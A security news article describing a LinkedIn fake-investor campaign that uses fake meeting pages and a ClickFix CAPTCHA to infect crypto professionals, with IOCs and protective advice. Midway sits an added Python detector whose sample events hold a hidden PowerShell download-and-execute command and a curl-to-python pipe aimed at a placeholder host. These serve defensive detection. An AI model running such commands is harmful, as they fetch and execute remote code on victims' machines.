Security researchers have uncovered a coordinated malware campaign targeting people working in the cryptocurrency and Web3 industry.
Attackers pretend to be venture capital investors on LinkedIn and approach professionals with fake funding opportunities. Their goal is to trick victims into running malicious commands on their own computers.
The campaign combines social engineering, fake meeting links, and a ClickFix-style CAPTCHA trick to infect both Windows and macOS systems.
Fake Venture Capital Identities on LinkedIn
The attackers create convincing LinkedIn profiles that appear to belong to executives from investment firms. Some of the fake firms used in the campaign include:
- SolidBit Capital
- MegaBit
- Lumax Capital
Using these profiles, the attackers send personalized messages to founders, developers, and community members in the crypto space.
The messages often mention the victim’s recent work or projects to make the approach look genuine.
After starting a conversation, the attacker quickly suggests a meeting to discuss investment or partnership opportunities.
Fake Meeting Links Used to Deliver Malware
Instead of normal corporate meeting tools, victims are directed to Calendly booking pages. These pages then redirect them to fake Zoom or Google Meet websites controlled by the attackers.
Some of the malicious domains include:
- zoom[.]us07-web[.]us
- hedgeweeks[.]online
These websites look like legitimate meeting platforms but are designed to deliver malware.
Moonlock Lab researchers reported that one victim interacted with a LinkedIn profile named “Mykhailo Hureiev,” who claimed to be the co-founder of SolidBit Capital.
The person insisted on using their own meeting link and became suspicious when the victim suggested using a legitimate Google Meet session.
Domain registration records later showed that several related websites were registered under the name “Anatolli Bigdasch” from Boston, whose identity is also connected to a LinkedIn profile claiming to run SolidBit Capital.
Researchers also discovered domains like lumax[.]capital, suggesting that the attackers continue creating new fake companies as older identities get exposed.
ClickFix Technique: Fake CAPTCHA Leads to Malware
When a victim opens the fake meeting link, they are taken to a webpage that looks like a conference site or news article.
The page displays what looks like a Cloudflare CAPTCHA asking users to confirm they are not a robot.
In reality the CAPTCHA is entirely under the attackers' control and performs no verification at all.
The infection process happens in three steps:
- A fake CAPTCHA checkbox appears on the page.
- Clicking the box secretly copies a command to the user’s clipboard.
- The page then instructs the user to open a terminal and paste the command to complete “verification.”
Because the victim runs the command manually, many security protections such as download filtering or exploit detection may not activate.
Malware Execution on Windows and macOS
On Windows systems, the command launches a hidden PowerShell process.
It decodes a Base64 payload that downloads a script from the attacker’s server and runs it directly in memory.
This fileless technique allows attackers to deploy additional malware without leaving obvious files on disk.
On macOS, the process uses a multi-stage bash command.
The script checks whether Python is installed, installs required tools if needed, and then downloads a Python-based malware payload.
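As an added example (not code from the article or from Moonlock Lab's research), the following Python checks process-creation events for the two execution patterns described above: a hidden PowerShell process whose Base64-encoded payload downloads and runs a script in memory on Windows, and a bash command on macOS that probes for Python and pipes a download into it. The sample events and the example.invalid URLs are constructed.

```python
import base64
import re
# Constructed process-creation events (not from the article); the first two mirror
# the ClickFix commands described above, the third is ordinary admin activity.
PS_STAGE2 = 'IEX (New-Object Net.WebClient).DownloadString("https://example.invalid/s.ps1")'
SAMPLE_EVENTS = [
    {"host": "WIN-01", "cmdline": "powershell.exe -w hidden -NoP -enc "
     + base64.b64encode(PS_STAGE2.encode("utf-16le")).decode()},
    {"host": "MAC-02", "cmdline": 'bash -c "which python3 || exit 1; '
     'curl -fsSL https://example.invalid/p.py | python3"'},
    {"host": "WIN-03", "cmdline": "powershell.exe -Command Get-ChildItem C:\\Users"},
]

# In a decoded PowerShell payload: fetch from the network, then run it without touching disk.
PS_REMOTE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b", re.I)
PS_EXEC = re.compile(r"\bIEX\b|Invoke-Expression|FromBase64String", re.I)
# In the macOS bash stage: probe for a Python interpreter, then pipe a download into one.
SH_PROBE = re.compile(r"(?:which|command -v)\s+python3?\b", re.I)
SH_PIPE = re.compile(r"\bcurl\b[^|]*\|\s*(?:python3?|bash|sh)\b", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (PowerShell expects UTF-16LE), or ''."""
    m = re.search(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return ""
    try:  # binascii.Error raised on bad Base64 is a subclass of ValueError
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", "ignore")
    except ValueError:
        return ""

def analyze_event(event):
    """Return sorted tags explaining why a process event resembles ClickFix execution."""
    tags, cmd = set(), event["cmdline"]
    if re.search(r"\bpowershell(?:\.exe)?\b", cmd, re.I):
        if re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.I):
            tags.add("hidden_window")
        decoded = decode_encoded_command(cmd)
        if decoded:
            tags.add("encoded_command")
            if PS_REMOTE.search(decoded):
                tags.add("remote_download")
            if PS_EXEC.search(decoded):
                tags.add("in_memory_exec")
    elif re.match(r"(?:/bin/)?(?:ba|z)?sh\b", cmd):
        if SH_PROBE.search(cmd):
            tags.add("interpreter_probe")
        if SH_PIPE.search(cmd):
            tags.update(("remote_download", "pipe_to_interpreter"))
    return sorted(tags)
```

Alerting on events that carry two or more tags, rather than on a lone `-enc` flag, keeps legitimate encoded administrative scripts from paging anyone.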
Researchers also identified Mach-O malware files used in the campaign that initially showed zero detections on VirusTotal.
Additional analysis found fake Zoom applications written in Swift. These applications imitate legitimate password prompts and send stolen credentials to Telegram while delivering different payloads for multiple operating systems.
Possible Links to UNC1069
Some aspects of the campaign resemble activity linked to UNC1069, a financially motivated group associated with North Korea that previously targeted cryptocurrency companies using fake Zoom meetings and ClickFix techniques.
Both operations share several similarities:
- Zoom-like domains used for phishing
- Social engineering through LinkedIn or messaging platforms
- Malware commands tailored for Windows and macOS systems
However, Moonlock Lab says there is not enough evidence yet to confirm that the same group is responsible.
How Professionals Can Protect Themselves
Security researchers advise crypto professionals to carefully verify any unexpected investment or partnership offers.
Always confirm the legitimacy of companies and domains, especially when the organization has a very recent online presence.
Be cautious if conversations quickly move away from LinkedIn or email to external meeting links. It is safer to independently verify the meeting platform before joining.
Most importantly, never run commands in a terminal when instructed by someone online. Legitimate investors, recruiters, or event organizers will never ask users to paste commands into their system as part of a verification process.
Indicators of compromise (IOCs)
| Type | Value | Context |
| --- | --- | --- |
| Domain | zoom[.]us07-web[.]us | Fake Zoom page, hosts ClickFix payload |
| Domain | zoom[.]07usweb[.]us | Fake Zoom page, hosts MegaBit fake company site |
| Domain | zoom[.]us05-web[.]us | Fake Zoom page, multi-platform payload server |
| Domain | goog1e[.]us-meet[.]com | Fake Google Meet page |
| Domain | hedgeweeks[.]online | C2 server; typosquat of Hedgeweek (hedgeweek.com) |
| Domain | lumax[.]capital | New campaign infrastructure (registered 2026-02-02) |
| URL | calendly[.]com/hureivemykhail/with-solidbit-meeting | Calendly link used in social engineering |